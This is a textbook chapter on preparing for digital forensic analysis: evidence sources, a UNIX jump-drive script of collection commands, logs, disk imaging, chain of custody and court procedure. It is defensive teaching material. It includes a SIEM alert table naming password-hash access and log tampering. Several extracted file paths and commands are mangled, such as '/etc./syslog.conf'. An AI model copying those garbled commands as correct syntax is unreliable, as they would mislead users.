https://csrc.nist.gov/Projects/ risk-­management/fisma-­background. Access NIST SP 800-37 Rev. 2 first.

References

289

15.4.1 Health First Case Study Problems For each case study problem, refer to the Health First Case Study. The Health First Case Study and Security Workbook should be provided by your instructor or can be found at https://sn.pub/lecturer-material. Case study Developing a partial audit plan

Health first case study √

Other resources Security workbook HIPAA slides or notes

References 1. Ludlow P (2013) OPINIONATOR; Hactivists as gadflies. New York Times, 14 April 2013 2. ISACA (2010) CISA review manual 2011. ISACA, Arlington Heights, pp 33–72, 223–226 3. ISACA (2013) ITAF™: a professional practices framework for IS audit/assurance, 2nd edn. ISACA, Arlington Heights, pp 9–40 4. SANS (2005) 507.1 auditing principles and concepts. SANS Institute. www.sans.org, Bethesda 5. Harris S (2013) All-in-one CISSP® exam guide, 6th edn. McGraw-Hill, New York, pp 121–125 6. ISACA (2013) IS audit and assurance guideline 2202 risk assessment in planning exposure. Exposure draft. ISACA, Arlington Heights, pp 2–10 7. ISACA (2013) IS audit and assurance guideline 2201 engagement planning. Exposure draft. ISACA, Arlington Heights, pp 2–8 8. ISACA (2013) IS audit and assurance guideline 2401 reporting, Exposure draft. ISACA, Arlington Heights, pp 2–10 9. ISACA (2022) IT Audit Framework (ITAF™): professional practices framework for IT Audit, 4th edn 10. Walker M (2012) All-in-one CEH™ certified ethical hacker exam guide. McGraw-Hill, New York 11. PCI Security Standards Council (2022) Payment card industry data security standard: requirements and testing procedures, v 4.0, March 2022. www.pcisecuritystandards.org 12. Verizon (2013) Verizon 2013 data breach investigations report. http://www. verizonenterprise.com/DBIR/2013. Accessed 20 Oct 2013 13. Payment Card Industry (2022) PCI DSS v4.0 Report on Compliance Template Revision 1 December 2022. www.pcisecuritystandards.org 14. ISACA (2013) IS audit and assurance guideline 2208 sampling. Exposure draft. ISACA, Arlington Heights, pp 2–9

Chapter 16

Preparing for Forensic Analysis

China has reiterated on multiple occasions that given the virtual nature of cyberspace and the fact that there are all kinds of online actors who are difficult to trace, tracing the source of cyberattacks is a complex technical issue. It is also a highly sensitive political issue to pin the label of cyberattack to a certain government. –Wang Wenbin, a spokesman for China’s Ministry of Foreign Affairs [1]

This chapter is intimately linked with Incident Response. First you respond to an incident to contain it, then you must analyze it. It is important to find the root cause, or the criminal will return to your network (or worse yet, never leave.) While the incident response chapter focuses more on the business side of what is important, this chapter introduces technical issues of how to find information and track it. This chapter addresses what is important to collect, where it is located, and how it should be collected, through describing the forensic process, a technical overview, and legal requirements.

16.1 Important Concepts Time is of the essence in an incident response scenario. Two competing goals include: (1) extract meaningful forensic data, and (2) contain the incident. These two goals may be prioritized in reverse order based on business requirements. A final goal may be to: (3) properly collect evidence for a legal case. The Incident Response chapter emphasizes (2) and this chapter emphasizes bullets (1) and (3). The approach to forensic analysis, when an incident has occurred and is being investigated, is to ask a series of questions: who, what, when, where, why…? It is important to build a timeline showing what happened when and where [3]. The developed case must be fact-based, proven with artifacts. Events of interest are the filtered events showing relevant actions. Evidence should corroborate the story from multiple perspectives: for example, the host requested a website from DNS, then the application webserver got the request and the database reported the

© The Author(s), under exclusive license to Springer Nature Switzerland AG 2024 S. Lincke, Information Security Planning, https://doi.org/10.1007/978-3-031-43118-0_16

291

16  Preparing for Forensic Analysis

292

attack – all within 15 min, times noted and providing information such as source IP and MAC addresses. As more facts are found, a theory of the case may change, and additional evidence acquired. These multiple sets of perspectives can be pulled from servers, network devices and host machines. All the forensic data obtained will need to be interpreted to tell a forensic story, at a high level, of the criminal attack. However, to obtain these artifacts, technical information about the servers, network devices and host machines must be mastered. Much of the artifacts will come from a host’s memory, network logs, security utilities, and network sniffing (e.g., Wireshark) tools. These tools must be set up properly in advance to ensure that the data has not been modified by the attacker; we need to ensure collected data reflects a true, authentic picture of what is happening on the system. Thus, technical expertise is needed to answer the high-level forensic questions asked above. Finally, if this case goes to court, the case must be well-constructed. Imagine you are sitting as an expert in a court of law and the opposing lawyer sees opportunities to win their case by finding minor flaws or your failure to detect or record one or more events in your procedures. They can question your qualifications, ask questions outside your area of knowledge, or demonstrate a flaw in your chain of custody procedure. There are requirements to obtaining evidence, including meeting chain of custody requirements to show restricted access; collecting authentic evidence through integrity-checked evidence and analysis on copies; using tools that are acceptable in court; and full documentation on how evidence was obtained and analyzed [3]. In addition to the opposing lawyer tripping you up, criminals are also looking for their escape hatch. The means of communication for forensics should be outside of normal corporate communications. This may include private cell phone and external email accounts [5]. The Incident Response Team must be well trained to execute their responsibilities. There are three areas of expertise that must occur simultaneously during a forensic investigation: forensic analysis skills to select and analyze the forensic evidence, technical forensic skills to access the forensic evidence, and legal evidence skills to meet legal requirements for authenticity and chain of custody. Table 16.1 helps to build and ensure proper training for IRT members. These three sets of skills are used simultaneously and described in this chapter. Table 16.1  IRT personnel and call list Expertise Forensic software Networking, protocol analysis Host logs – Windows, Linux, … SIEM expertise

Contact Information: Name(s) Email, phone

Training completed (or needed) Forensic certification Networking education or certification System certification (per system being analyzed)

16.2  High-Level Forensic Analysis: Investigating an Incident

293

16.2 High-Level Forensic Analysis: Investigating an Incident The process of investigating an incident includes establishing the questions you would like to answer as part of the forensic investigation, collecting volatile information from memory, and collecting nonvolatile information such as logs, and disk images for forensically analyzing systems. There are also other network devices that may offer important information. Throughout the process, maintaining chain of custody is critical for potential evidence.

16.2.1 Establishing Forensic Questions The first step is to ask relevant questions about the scenario [3]. In an example scenario, we assume that a Rogue Wireless Access Point (WAP) has been observed. This may be detected as a new Ethernet node appearing on the network, requesting an IP address and forwarding packets from a variety of IP addresses, or via radio (e.g., Wi-Fi) as a new competitive WAP. The relevant questions that may be asked for this scenario are shown in Table 16.2 Questions for Investigation. Answers to these questions should paint a clear story that leaves no doubt as to the originator(s), actions and intent.

16.2.2 Collecting Important Information There are many things to investigate in a computer, including files, logs, configuration/registry, web accesses, network usage, software programs, memory/cache, etc. These are mainly investigated using forensic tools. However, it is also useful to know where certain information can be found outside the main computer. The network contains a lot of useful information as summarized in Fig. 16.1. Servers provide information related to application usage [3]: Authentication Service: This server provides a centralized mechanism for tracking logons to various systems and services. Its forensic value is to track successful Table 16.2  Questions for investigation: rogue wireless access point (workbook exercise) Incident Questions to investigate

Rogue Wireless Access Point (WAP) When did the rogue WAP appear? Who connected to it? Who introduced it? How do we eliminate it? What information passed through the rogue WAP and may have been compromised? What else might the owner of the rogue WAP do?

294

16  Preparing for Forensic Analysis Connections, Network, Transport layer prohibited packets, configuration changes MAC Addresses, configurations, monitoring Router: Source IP address tracking, illegal packets, statistics, configuration changes

Authentication Server: Successful/unsuccessful logon, unusual times

DHCP: Translates MAC address to IP address, possibly machine name, can derive manufacturer/type Web Proxy: Web accesses, malware origination, view downloaded web pages

DNS: Cache lookups track who accessed services when (e.g., email, web, ssh) Application Server: View normal events, errors and abuses via logs

Switch: Translate MAC address to physical port, monitor traffic

Fig. 16.1  Finding Forensic Information in the Network

and unsuccessful logon attempts, with their date and times. This system can identify password guessing attacks, unusual access times, and unusual services used. It is also important to tracks configuration changes to user accounts. Application Servers: Database servers, web servers, email servers, and voicemail servers provide functionality related to their name. Their forensic use is to track normal events that happen related to those servers, as well as to report on observed errors and abuses via logs and alerts. Configuration changes are also worthy to investigate. Web Proxy: A web proxy improves network performance and response time by caching webpages. They serve to filter and log web traffic. The forensic value of web proxies is to track web surfing traffic for individual users or client IP addresses, as well as logging inappropriate accesses. This information can help to trace phishing accesses, trace sources of malware, and enable viewing of downloaded materials. Network devices can help to find the following information [3]: Domain Name Service (DNS): DNS translates hostnames to IP addresses and vice versa. For forensic purposes, DNS can track cached lookups from external sites (e.g., web, ssh, email, etc.) and provide timeframes of access for timeline analysis. Dynamic Host Configuration Protocol (DHCP): DHCP allocates IP addresses to edge nodes within local area networks. This function is generally implemented in routers, Wireless Access Points or infrastructure servers. DHCP’s forensic

16.2  High-Level Forensic Analysis: Investigating an Incident

295

value is that it may identify MAC addresses from leased IP addresses and indicate when the IP address was allocated, or when the device connected to the network. It may also provide a hostname. The identified MAC address can then identify a network card manufacturer (although MAC addresses are forgeable.) Firewall: A firewall filters packets by forwarding appropriate packets and discarding inappropriate packets (optionally with logging or alerting). For forensic purposes, when logging and alerting are enabled, this notifies administrators of incidents detected by the firewall at the protocol levels supported by the firewall (usually including the network and transport layers, and possibly up to the application layer). Firewalls should also report alerts on configuration changes and may be used to monitor network statistics. Network Intrusion Detection System: A NIDS monitors network traffic for unusual or inappropriate packet sequences potentially at all packet layers. Its forensic value is to report on unusual or inappropriate packets. They may also report on system configuration changes and enable monitoring of network statistics. There must be a balance between collecting required useful information and getting swamped with too much data. Therefore, the NIDS may be configured to collect protocol header information only. During an investigation, recordings may be extended to collect additional packet information in both scope and content, particularly focused on the attack. Switches: Switches aggregate communications from endpoints to the core network. Edge switches interface with user and other endpoints and core switches aggregate communications from multiple edge switches. The forensic uses of edge switches include identifying a physical wire from a MAC address, and monitoring transmissions to endpoint(s) by listening to a SPAN port configured for mirroring. SPAN ports enable copying of transmissions to endpoint(s) for protocol analysis. Wireless Access Points: These are wireless routers that create a wireless local area network. Wireless access points often advertise their names and capabilities. Monitoring this information can find rogue access points and ensure that bona fide access points are advertising the proper encryption algorithms and configuration. It is also possible to monitor wireless devices, by monitoring MAC addresses for validity and to monitor volumes of information sent and received. Host computers that the attacker penetrates should also be investigated: Hosts: Client and Server machines contain volatile and non-volatile (e.g., disk drive) information. Its forensic value is to learn what the attacker did while accessing the machine, e.g., through logs. Sources of information may include defensive software including antivirus, endpoint security system, and Host Intrusion Detection System software. Their capabilities may range from detecting and naming of installed malware to providing details of violations of configuration or policy. The next section on Technical Methods section describes more of how hosts can be analyzed.

296

16  Preparing for Forensic Analysis

Cameras: Cameras record actions within camera view, thus serving as a deterrent for potential criminals. Forensically they can help to track physical intruders and provide video evidence of intrusion. Internet of Things (IoT): Smaller, newer, cheaper, and/or low-power devices may be particularly vulnerable to security attacks; logs for these devices should also be monitored. What may seem an insignificant Wi-Fi controlled lightbulb may be the key attack vector or exposed surface. Figure 16.1 summarizes where important forensic information may be found, and Table 16.3 provides an example scenario. In addition to knowing where to find information, time is of the essence when gathering forensic information. Consider the following priorities in advance of an event: [3]. • Value: What information is most important? • Effort: What information is easily accessible? • Volatility: What information will disappear (e.g., in memory)? Table 16.3  Determining where to find information: rogue wireless access point (workbook exercise) Potential incident Rogue wireless access point (WAP)

Important information to obtain Currently connected terminals (to rogue WAP and true WAP) Characteristics and identity of rogue WAP

Connection time of affected terminals and rogue WAP

Location of rogue WAP

Applications used by persons during this time Person who installed rogue WAP Determine what rogue WAP accessed

Location of information Accessible Wireshark: Connect Wireshark with radio capability and monitor for current transmissions to: 1. Observe MAC addresses interfacing with rogue and true WAP; 2. Observe MAC address of rogue WAP and identify network card type; 3. Identify where signal strength to rogue WAP is strongest. DHCP: Determine which MAC addresses connected at which times, including rogue WAP (if available). WAP: Determine when MAC addresses connected and left the true WAP. Switch: Identify switch physical port and wire from rogue WAP’s MAC address to determine where rogue WAP connects. Confirm the Ethernet address and network card match as expected DNS cache indicates IP addresses recently accessed; people interviews Equipment inventory list: Assigned person Camera (if available nearby) Forensic analysis on machine running rogue WAP, to investigate or confirm what happened during timeframe in question

16.3  Technical Perspective: Methods to Collect Evidence

297

That leads us to the question of how to collect this high priority information. To access this information in host and network machines, technical expertise is required.

16.3 Technical Perspective: Methods to Collect Evidence This section describes three important methods to collect artifacts, including: • Collecting volatile information: the current picture of what is happening; • Collecting and analyzing logs • Copying and analyzing disk images

16.3.1 Collecting Volatile Information Using a Jump Kit Since volatile information is the first information to be lost or overwritten, we look at this information first. Volatile information is caught as soon as possible when the attack is recognized, and includes the current information of active logons, open files, logged in users, active processes, and current network connections. It is also important to copy all logs, before criminals have a chance to overwrite them [8]. At the time a computer is powered down, or after minutes have passed following an incident, this information can be lost. After power down, a forensic image is taken of the disk, which then can be analyzed. Since criminals can change the operating system to hide their actions, it is important to not rely on system and forensic tools executed on the system under question. A forensic jump kit contains a USB drive with forensic software. Forensic tools from this drive should be run to collect volatile information. It is good to start and end with commands collecting the system time, to track when the forensic dump occurred. Forensic examiners travel with a jump kit, which includes a laptop preconfigured with protocol sniffers and forensic software, and network taps, cables and sanitized drives [16]. Often, the initial part of an investigation will be to get a full memory and disk image snapshot, which includes a record of network connections, open files, and in progress processes. Since the attacked computer may have a corrupted operating system, the jump kit provides reliable tools to obtain valid data. A jump drive enables the investigator to record volatile information reliably in a short time. The jump drive includes command script(s) containing commands to record volatile information. Volatile information should be recorded in the order of volatility and may consists of [3, 4]: • Processor memory: Cache and registers (For routers, switches and NIDS, this includes recording the running configuration.)

16  Preparing for Forensic Analysis

298

• Network state including current network connections, the routing configuration and ARP table. • List of running processes • Current statistics and recent command history. • Swap file: This is the recent memory used by a computer for virtual memory purposes. • Date and time, for evidentiary purposes. The date and time should be recorded as the first and last commands of the jump drive script. Kali Linux on DVD or a bootable USB drive should be part of the toolkit, in order to run commands on a secure O.S. and not rely on the potentially corrupted O.S. being investigated. A good technical source of commands to build this table is: Blue Team Handbook: Incident Response Edition, by Don Murdoch [5]. Murdoch recommends saving off volatile information in order of processor (register, cache, memory capture, process state tables), network (routing, ARP, statistics), main memory, and file system/swap space. Table 16.4 lists some good commands for a jump drive script for a Linux/UNIX machine [4, 5]. The jump drive should be well labelled: Linux Incident Response. The jump kit should also include incident forms, notebooks, pens, a flashlight with batteries uninstalled, and the Incident Response Team call list [5]. The investigator must be careful to not taint the evidence. For example, if a cell phone is left on to retain evidence, it must be kept in a Faraday bag, which will (hopefully) shield the phone from connecting to networks [15]. Table 16.4  Jump drive script for UNIX Command date dd if=/dev/mem of=/ evidence/case123.memory hostname ls -la uptime printenv pstree -a ps -ef who last history Ip netstat netstat -nr arp -a systemctl date

Function Display the current date and time Copy memory from main memory (/dev/mem) and writing to evidence/case123.memory or an appropriate path. Print the host name of this machine, applicable if IP address is in a DNS. List directories including permissions, last modifications Display how long the system has been powered up Print the environmental variables (e.g., command paths) Display a tree of processes Display statistics of all current processes Display logged-in users Display history of all users logged in and system boot time Display the command history of the last 500 commands Display IP address, router, DNS server with varied options Display connections and active network listeners Display routing table Display arp table Displays the status of all services Display the current date and time

16.3  Technical Perspective: Methods to Collect Evidence

299

Photos are taken of inside and outside of the computer, to document the full hardware configuration of the computer [15]. After an investigator photographs an active screen and records memory contents, the computer may be powered down.

16.3.2 Collecting and Analyzing Important Logs Monitoring logs is useful on the attacked host as well as other network devices. Logs or events are the messages that systems and network devices produce to report warnings or errors. It is important to ensure they are configured properly, monitored regularly, and reacted to quickly when important incidents occur. A thoughtful configuration of logs is required to collect appropriate logs in correct ways. To counter deleted or modified logs, logs must be transferred off a device quickly after they are recorded and should be accumulated in centralized log server(s). A centralized log server enables logs to be sorted and analyzed in one location, in order to build a timeline. In order to easily sort logs for analysis, log times and their originating computer clocks must be synchronized in the network. This is best achieved using two methods. First, it is best to agree on a time system across a corporate network. Correlating log times can be confusing due to different time zones, daylight savings times, and mobile or moved devices on non-local time zones. Therefore, working with one standard time across a corporate network makes correlating and analyzing logs easier. The standard time zone used is Universal Time Coordinated (UTC), which started Jan 1, 1972 and corresponds to the time zone Greenwich Mean Time [2]. The second helpful method to synchronize time is the Network Time Protocol (NTP), which ensures that devices that interface in a network communicate among themselves to agree on a precise time to a reasonable level of accuracy. Without NTP coordination, computer clock times may run slightly fast or slow, and sorted logs may appear out of logical order. It is particularly interesting to monitor for the logs when an operating system powers up or first connects to the internet. The power up sequence has a set of automated start up processes, and log(s) indicate when the boot is complete. Therefore, a log of a suspicious process can be confirmed as from an automatic startup or user initiated. It is also helpful to remember that any direct commands to physical devices or any disabling of interrupts are only permitted by the operating system (i.e., in kernel mode) and not by any application or external O.S. utility (i.e., in user mode). Windows: Windows logs can be accessed by searching for ‘Event Viewer’. Fig. 16.2 shows there are two basic categories under Event Viewer: ‘Windows’ and ‘Applications and Services’. In general, Windows relates to operating system logs, whereas ‘Applications and Services’ relates to optional software packages, which also includes some Microsoft applications, such as Word and Excel [2].

300

16  Preparing for Forensic Analysis

Fig. 16.2  Windows event viewer for logs

Windows Log priorities can be sorted by priority when the logs are displayed. Priorities include [6]: • • • •

Critical: Requires immediate attention Error: Problem does not require immediate attention Warning: A future problem is arising Information: For your information

Windows logs categories include the following examples [2]: • Application: Information related to MS applications: e.g., Outlook, MS Edge • Security: audit information, logon/logoff, resource utilization. Policy is established through MMC Local Security Policy and results can be ‘audit success’ or ‘audit failure’. • System: Operating system events: e.g., low power, system connections • Setup: Patches applied or failed to apply • Forwarded: Logs forwarded from other systems are stored here. UNIX/Linux: System log capabilities include syslog, syslog-ng (next generation), rsyslogd (reliable and extended syslog) and journalctl. Syslog-ng and rsyslogd provide extra capabilities to support both TCP and UDP, use encryption, and support enhanced configurability. Rsyslogd also supports IPv6 and high precision timestamps [3]. Journalctl utilizes syslog’s priorities and its next generation utilities. The format of Linux/UNIX logs is: [Process ID]: . UNIX, Linux and Mac configuration files are located in /etc. The log configuration file may be found in an /etc. directory, such as /etc./syslog.conf or /etc./syslog­ng/syslog-ng.conf or /etc./systemd. The logs themselves are normally stored in files at /var./log, if not forwarded to a centralized log server. Log files are often named after . , where indicates the functional category and relates to the priority [2].

16.3  Technical Perspective: Methods to Collect Evidence

301

Table 16.5  Important Windows logs and their sources (example) Important information Expanded security permissions Password guessing Logs deleted or disabled

Try to access privileged file or directory Access the password hash file Computer account created

Device(s) Required logs Windows 4728, 4732, 4756 member added to security-enabled group Windows 4740 user account locked out Windows 1102 log deleted 4719 log recording is disabled 4902 changes to audit policy, can include turning off logging Windows 4663 attempt made to access object

Notification method Alert by SIEM Alert by SIEM Alert by SIEM

Log

Windows 4782 password hash account accessed Alert by SIEM Windows 4741, 4742 computer account created Alert by SIEM or changed

Since logs may be modified by attackers to hide their tracks, it is important to forward, in particular, security-related and priority logs to a dedicated centralized log server. Table 16.5 indicates some important logs that should be of concern [4, 7]. Logs that are forwarded to a centralized log management system, not only protect the logs from modification but also notify administrators of problems. Centralized log managers enable logs to be stored, sorted and searched in a generic way. A Security Information and Event Management (SIEM) tool is a sophisticated form of centralized log manager with additional security capabilities, including a focus on security, integration with more tools including antivirus, correlation of events, issue-tracking capability, and some fine-tuning programmability.

16.3.3 Collecting and Forensically Analyzing a Disk Image As part of a forensic investigation, it is important to analyze disk contents. In the computer forensic field, the original data must be touched as little as possible. Even alteration of a single file access time can invalidate evidence. Therefore, forensic analysis must be done with a copy of the disk, and not an original. It is recommended that two copies of any evidence be made: the first for analysis, and the second as backup to the original [4]. Using two different imaging tools can be helpful to ensure and prove authenticity. Figure 16.3 shows how a forensic image is created. To ensure the original disk or media has not been modified, an integrity hash is calculated over the entire original disk or media. Replicas are created by copying bit-by-bit from the original, using an approved-for-court media copy tool. Upon completion, the copy should be set to write-protect (read-only) to prevent alteration [8]. hen an integrity hash is calculated over the replicas, they should have the same hash value as the original. This ensures

302

16  Preparing for Forensic Analysis

Fig. 16.3  Creation of an identical disk image for forensic analysis

that the analysis of the media replica, admitted into court, is also accurate. Finally access to the copy must be controlled for purposes of authenticity and chain of custody. The date and time of all forensic actions, including recording computer memory, powering down the computer, taking the integrity hash, copying the original disks, and securely storing the original disk for safe-keeping, must be recorded as part of the Chain of Custody requirements [Ali12] [9]. Analyzing the disk should be done using a machine that has no access to the internet, in a room with controlled physical access and that is shielded from electromagnetic interference (e.g., no access to radio/Wi-Fi) [4]. Forensic tools are useful in normalizing data (or converting disk data to easily readable form). During the forensic analysis, the disk or media copy is analyzed for logs, file timestamps, file contents, recycle bin contents. Hidden disk space can include unallocated disk space, space at the end of volumes or files (volume slack, file slack, master boot record slack), and good disk blocks marked bad and reused [Ali12, 4]. With forensic tools it is possible to search for keywords throughout the disk. Example forensic toolkits include: • EnCase: Interprets data of hard drives of various operating systems, tablets, smartphones and removable media for use in a court. (www.guidancesoftware.com) • Forensic Tool Kit (FTK): Supports Windows, MAC, UNIX/Linux operating systems including analysis of volatile (RAM memory and O.S. structures) and nonvolatile data for use in a court. Excellent Windows disk analysis of Windows registry and interpretation of popular Windows and other applications. (www. accessdata.com)

16.4  Legal Perspective: Establishing Chain of Custody

303

• Cellebrite: Decodes data for commercial mobile devices for use in a court. Mobile devices are connected via appropriate cables to a workstation with the forensic tool installed, or via a travel kit. (www.cellebrite.com) • OSForensics: This is a lower-cost, easily useable, nearly full-featured forensic software. • ProDiscover: Analyzes hard disks for all Windows operating systems, as well as Linux and Solaris. An Incident Response tool can remotely evaluate a live system. The Basic version is a test version that can be downloaded for free. (www. techpathways.com) • X-ways: Specializes in Windows operating systems. X-ways can evaluate a system via a USB-stick without installation, and requires less memory than other forensic tools. Other products include a disk imager and permanent disk erasure. (www.x-­ways.net) • Sleuthkit/Autopsy: This open-source tool evaluates Windows, Unix, Linux and OS-X operating systems. It is programmer-extendable. The Sleuth Kit (TSK) is a command-line tool, while Autopsy provides a graphical interface. (www. sleuthkit.org) • Redline: A free Windows collector and analysis tool, takes a snapshot of a device for investigative purposes to find signs of malicious activity through memory and file analysis. (www.fireeye.com) • AnaDisk Disk Analysis Tool: This tool operates on different types of disk systems (DOS, Mac, UNIX TAR) and is capable at looking into slack space and other data hiding locations. A Linux Live CD enables booting a suspect system from a memory (USB drive or CD) running Linux to investigate its hard disk image. Example live CD systems include Helix and Kali Linux. In situations particularly where forensic tools are weak, an investigator may want to load a disk image or observe how a system or application behaves. The ForensicExplorer tool (www.forensicexploerer.com) enables the loading of an image into a virtual machine in read-only mode [4]. To observe an application, the investigator may launch an application on a virtual machine, running identical versions of operating system and software packages.

16.4 Legal Perspective: Establishing Chain of Custody The legal aspect is concerned with authentically collecting, preserving, and presenting evidence in court. If a case will ever succeed in court, any hacking or fraudulent crime must be properly handled according to law enforcement procedures. This section introduces the required precautions and court procedures. However, law enforcement or experienced forensic experts are necessary to ensure all details are correctly handled.

304

16  Preparing for Forensic Analysis

Authenticity of evidence is concerned with the true history of the investigation. Authenticity requires that the evidence is from the system under investigation, and the evidence was not altered [Ali12] [9]. A Digital Evidence form describes a piece of evidence, and where/when it was collected, stored and imaged. The evidence description includes manufacturer, model, serial number, and digital hashes [4]. A Chain of Custody form tracks who handled the evidence from minute to minute and ensures that the evidence was properly sealed and locked away with extremely limited access (Fig. 16.4). The Chain of Custody document describes when and where the evidence was held/stored, and the name, title, contact information and signature for each person who held or had access to the evidence at every time point and why they had access [10, 16]. It is useful to have a witness at collection points (See Fig. 16.4.) Cryptographic hashes ensure that the forensic artifacts are not modified [2]. Evidence is stored in evidence bags, sealed with evidence tape, and stored in locked cabinets in a secured room. Eventually the time spent and hourly rates must be totaled for internal metrics and legal justification. When the case is brought to court, the disk copy tool and forensic analysis tools must be standard and qualified for court. Also, the investigator’s qualifications, including education level and forensic training, will be subject to scrutiny [15]. Forensic Examiners should be certified, either through forensic software vendors (e.g., EnCase, FTK) or through independent organizations (with sample certs: Certified Computer Forensics Examiner or Certified Forensic Computer Examiner). Some states require a private detective license. The Investigation Report will need to describe the details of the incident accurately. It will need to provide descriptive details of all evidence and forensic tools used in the investigation. All evidence must be easily referenced and provided in full detail, including interview information and communications. Actual data should be provided for forensic analysis results. The report should fully describe how any conclusions are reached in an unambiguous and understandable way. The report shall also include the investigator’s contact information and dates of the investigation, and the report must be signed by the investigator [11, 12].

Fig. 16.4  Chain of custody timeline

16.5  Advanced: The Judicial Procedure

305

16.5 Advanced: The Judicial Procedure The Investigation. If the investigation is initiated by law enforcement, which is investigating an organization or home, a search warrant is required unless the organization/home gives permission; the crime is communicated to a third party; the evidence is in plain site or is in danger of being destroyed; evidence is found during a normal arrest process; or if police are in hot pursuit [15]. Computer searches generally require a warrant except when a signed acceptable use policy authorizes permission. Also, if a computer is submitted for repairs, the repair person during their normal repair functions may notice illegal activities, such as child pornography [10]. In this case, they can report the computer to law enforcement. The judicial proceedings begin for a civil case when a Complaint (or lawsuit) is filed, and for a criminal case when someone is arrested. For a civil case, the defendant must send an Answer within 20 days [15]. In the United States, when a suspect is going to be questioned about a crime, the Miranda rights must be read: “You have a right to remain silent…” In some states, a prosecutor then files an Information, detailing the criminal charges. Alternatively, a grand jury issues an indictment if they determine that the alleged charge should proceed. Discovery. During Discovery, the plaintiff, who initiated the lawsuit, and the defendant provide their list of witnesses and evidence to the other side. Each side may then request testimony, files and documents from the other to determine legal claims or defenses [13]. Such documents are called Responsive documents and can take the form of electronically stored information (ESI). The U.S. Federal Rules of Civil Procedure define how ESI should be requested and formatted. E-discovery (or ESI) requests can be general or specific, such as a specific document or a set of emails referencing a particular topic. Depositions are interviews of the key parties, such as witnesses or consultants [17]. A deposition consists of a question-and-answer session, where all statements are recorded by a court reporter and possibly via video. The deponent, or person who answered questions during the deposition, may correct the transcript before it is entered into court record. Evidence admissible to a court includes reports or testimony. Witnesses can be fact witnesses, expert consultants, or expert witnesses [13]. Fact witnesses report only on their participation related to the case, generally in obtaining and analyzing evidence. When providing testimony, they must present their qualifications. Email correspondence with lawyers is given attorney-client privilege and cannot be requested during discovery. However, notes, reports, and chain of custody documents are discoverable. Expert consultants help lawyers in understanding technical details, but do not testify or give depositions. Expert witnesses are the most qualified with extensive experience [13]. Computer forensic examiners often serve in this role. They provide expert opinions within

16  Preparing for Forensic Analysis

306

reports and/or testimony at both depositions and trials. They do not need to have first-hand knowledge of the case, but can interpret evidence obtained by others. Expert witness testimony must be carefully given, because if an expert contradicts himself, the judge may order the jury to ignore the testimony. That expert’s mistake can then be brought into question in future cases, and thus can ruin her reputation. Declarations are written documents, where the declarer states publicly their findings and conclusions [17]. Their name, title, employer, qualifications, and often billing rate are all documented in the declaration. The case is identified and the declarer’s role and position are clarified; the declarer signs the document. An affidavit is similar in outline to a declaration, but stronger since the affidavit is signed by a notary. Both declarations and affidavits are limited in breadth to support motions. An expert report can provide opinions, but should do so extremely carefully since every word may be challenged by expert witnesses on the other side [17]. All court reports become public documents unless they are specifically sealed. Any public document can be challenged in the current – as well as future – cases; thus, a witness must be very confident in anything they write in such a report. Providing full references to public documents helps to defend your position and bolster your claims. Discovery usually ends 1 to 2 months before the trial, or upon agreement by both sides. The Trial. The four stages of a typical trial include opening arguments, the plaintiff’s case, the defendant’s case, and closing arguments. In the United States and the United Kingdom [14], case law is determined by regulation, but also by precedence: when regulation is not explicit and must be interpreted, then decisions in previous cases hold weight. To obtain a conviction in a criminal case in the U.S. and U.K., the burden of proof must be “beyond a reasonable doubt” that the defendant committed the crime [14]. In a civil case, the U.K. burden of proof is “the balance of probabilities” or “more sure than not”.

16.6 Questions and Problems 1. Vocabulary. Match each meaning with the vocabulary. NTP SIEM

Volatile Authenticity

Jump kit Centralized log server

Chain of custody

(a) The legal process of protecting evidence, by documenting all actions, working with a witness, and by not altering the evidence. (b) A protocol that ensures that devices in a network have their time synchronized. (c) Information that is erased upon power down. (d) A reliable technique to collect volatile information from a device.

16.6  Questions and Problems

307

(e) A system that collects logs from a set of devices to prevent log modification. (f) A centralized log collection system that analyzes and summarizes log history. (g) Analyzed evidence must perfectly match the original evidence. 2. Finding important information. Where can the following information be found? Switch Web proxy NIDS

Router Firewall Camera

Application server Domain name server Wireless access point

Authentication server Dynamic host configuration protocol

(a) Translates a MAC address to a physical wire. (b) Translates an IP address to a MAC address. (c) Caches the email, web and other sites visited by a user or IP address (d) Lists when a user logged into different services or devices (e) Describes the websites a user visited and its responses (f) Indicates errors encountered by specific applications (g) Tracks people who physically entered an area (h) Can detect network scanning (multiple answers) 3. High-level Forensic Analysis. Complete the two tables: Table 16.2: Question for Investigation and Table 16.3: Determining where to find information, for the following incidents: (a) User permission is advanced to system administration level. (b) The database reports a tripling of data access in 1 day. 4. Discovering important logs. Consider the following scenarios. What logs or alerts might help, and where might you find them? (Fig. 13.2 may help.) (a) SQL attack (b) Phishing attack leads to network mapping and password guessing attacks (c) A worm in the network (d) Ransomware is being installed 5. Locating important logs. Look in your operating system to find your logs. Find 5 logs that you think should be forwarded to a centralized log server. Discuss where you found the logs, including the given log category and priority. Indicate why you think they are important to forward from a forensic perspective. 6. Forensic Tool Evaluation. Select a forensic tool to evaluate. What capabilities does this forensic tool have? What devices or operating systems does it analyze? How much does it cost? Can it be used legally? Write a description of this tool.

308

16  Preparing for Forensic Analysis

References 1. Conger K, Frenkel S (2021) Thousands of Microsoft customers may have been victims of hack tied to China. NY Times, 7 March 2021 2. Messier R (2017) Network forensics. Wiley, Indianapolis 3. Davidoff S, Ham J (2012) Network forensics: tracking hackers through cyberspace. Pearson Education, Upper Saddle River 4. Easttom C (2019) System forensics, investigation, and response, 3rd edn. Jones & Bartlett Learning, Burlington 5. Murdoch D (2014) Blue team handbook: Incident response edition, Version 2.0. Don Murdoch 6. Microsoft (2016) Trace and event log severity levels, 10/20/2016 taken from: https://docs.microsoft.com/en-­us/previous-­versions/office/developer/sharepoint-­2010/ff604025(v=office.14) 7. The 8 most critical Windows security event IDs. https://download.manageengine.com/products/active-­directory-­audit/kb/the-­eight-­most-­critical-­windows-­event-­ids.pdf. ManageEngine. Accessed 13 July 2021 8. Jarrett HM, Bailie MW, Hagen E, Eltringham S (ed) (n.d.) Prosecuting computer crimes, Office of Legal Education, Computer Crime and Intellectual Property Section, Criminal Division. https://www.justice.gov/criminal/file/442156/download 9. Ali KM (2012) Digital forensics: best practices and managerial implications. In: 2012 fourth international conf. on computational intelligence, communication systems and networks, IEEE Computer Society, http://ieeexplore.ieee.org, pp 196–199. 10. Brown CLT (2006) Computer evidence: collection & preservation. Charles River Media, Newton Centre, MA, pp 16–17, 28. 11. ISACA (2019) CISA(R) Review Manual, 27th Edition, ISACA, Arlington Heights IL. 12. ISACA (2015) CISM(R) Review Manual, 15th Edition, ISACA, Arlington Heights IL. 13. Cowen D (2013) Computer forensics: InfoSec pro guide. 